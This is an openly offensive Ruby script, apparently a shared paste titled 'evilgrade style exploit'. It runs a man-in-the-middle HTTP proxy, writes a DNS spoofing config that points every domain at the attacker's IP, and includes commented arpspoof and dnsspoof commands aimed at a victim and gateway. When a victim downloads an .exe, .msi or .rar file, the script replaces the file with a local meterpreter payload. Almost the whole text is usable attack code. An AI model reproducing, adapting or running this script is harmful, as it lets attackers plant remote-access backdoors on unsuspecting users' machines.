evilgrade style exploit. . . by bigmac

1. #sudo ruby proxy.rb port
2. #sudo ruby proxy.rb 666
3. #sudo is need for opening a socket
4. require 'eventmachine' #must install eventeventmachine
5. prox_port=ARGV[0]
6. attacker_ip="192.168.0.2" #local host
7. meterpreter="/tmp/meterpreter" # search this script and replace /home/bigmac/tmp/meterpreter
8. #meterpreter.EXE meterpreter.MSI meterpreter.RAR meterpreter.ZIP
9. #if the meterpreter exist with the file extension the client is attempting to download then the switch will be made
10.  
11. dns = File.open("dns.conf", "w+")   # set up for dns spoofing domains to this proxy
12. dns.write("#{attacker_ip}        *.*")# this is your ip,
13. dns.close
14.  
15.  
16. #      uncommment these lines when you want to use arpsoof/dns
17. #victim="192.168.1.111"
18. #gateway="192.168.1.1"
19. #`pkill spoof`
20. #a=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{victim} #{gateway}'"}
21. #c=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{gateway} #{victim}'"}
22. #b=Thread.new{system"xterm -e 'dnsspoof -i wlan0 -f dns.conf'"}
23. #a.run
24. #b.run
25. #c.run
26. Thread.start{
27. class Client < EM::Connection
28.         def initialize(other, finger, *args, &blk)
29.                 @other, @finger = other, finger
30.                 super(*args, &blk)
31.         end
32.  
33.  
34.         def post_init
35.     @payload_extension=""
36.           send_data @finger.sub("Accept-Encoding:","Assept-Ensoding:") #send a get request, but disable encoding gzip
37.         for x in [".exe",".rar",".msi"]# payload format list, checking for file extension... add more of these to the list
38.             extension_check=@finger.scan(/#{x}/).to_s
39.             if extension_check.length>1
40.             @payload_extension<<extension_check
41.             end
42.         end
43.         if @payload_extension.length==0
44.             @payload_extension=""
45.        
46.         end
47.        
48.         end
49.  
50. #Content-Type: application/x-msdos-program
51. #Content-Type: application/x-msdownload
52. #Content-Type: application/octet-stream
53. #Content-Type: application/x-msihttp://www.i8igmac.tk/file.exe
54. #Content-Type: application/x-rar
55. #Content-Type: application/octet-stream
56. #a list of possable application download... maybe check the GET request for jar? exe? msi? rar?
57.  
58.         def receive_data(response)  # this is the part that the web client will see... change with evil code
59.          clength = response.scan(/Content-Length: \d+/).to_s.sub("Content-Length: ","")
60.         if response.scan("Content-Length: ").to_s == "Content-Length: " # if true
61.            
62.             if @payload_extension.length>1 # if true
63.                 for trigger in ["application/x-msdos-program","application/x-msdownload","application/octet-stream","application/x-msi","applictation/x-rar","application/rar","application/octet-stream"] # add more triggers to this list
64.                     if response.scan("#{trigger}").to_s.length>1 # if string is found, trigger
65.            
66.                         if File.exists?("/tmp/meterpreter#{@payload_extension.downcase}")#= true
67.                         puts " injecting #{@payload_extension} SUCCESS"#we need to check if payload exist and use this extension
68.                         payload=File.read("/tmp/meterpreter#{@payload_extension.downcase}")#if the payload  does not exist then this will break the script
69.                         headers,body = response.split("\r\n\r\n", 2)
70.                         @other.send_data headers.gsub(clength,payload.length.to_s)+"\r\n\r\n"+payload
71.                         else
72.                         puts "payload does not exist? meterpreter#{@payload_extension} sending unmodified data"
73.                         end
74.                
75.                     end
76.                 end #start for trigger loop
77.             end#start of if payload extension.length
78.            
79.                 end
80.             @other.send_data response
81.             #if no injection was found, send the unmodifi we pass to the webbrowsered response to the client
82.         end
83.        
84.    
85.    
86.    
87.  
88. end
89.       #browser open to http://192.168.1.114
90.       module EchoServer
91.        def receive_data(finger) #finger is the header recived from the client, could log these cookies or log these pages
92.          ping = finger.gsub(" ","").index("Host:")
93.          pong = finger.gsub(" ","").index("\n",ping)
94.          host = finger.gsub(" ","")[ping..pong].gsub("Host:","").chomp #old method for gathering the host: field... could shorten this
95.          #i dont know if this will prevent loading from cache
96.          data=finger.sub("If-None-Match:","If-None-MutXX:").sub("If-Modified-Since:","If-Modified-SXnce:")
97.           EventMachine::connect host, 80, Client, self, data # ask google for response...
98.         end
99. end
100. }
101.       EventMachine::run {
102.         EventMachine::start_server attacker_ip, prox_port, EchoServer
103.       }        #             YOUR IP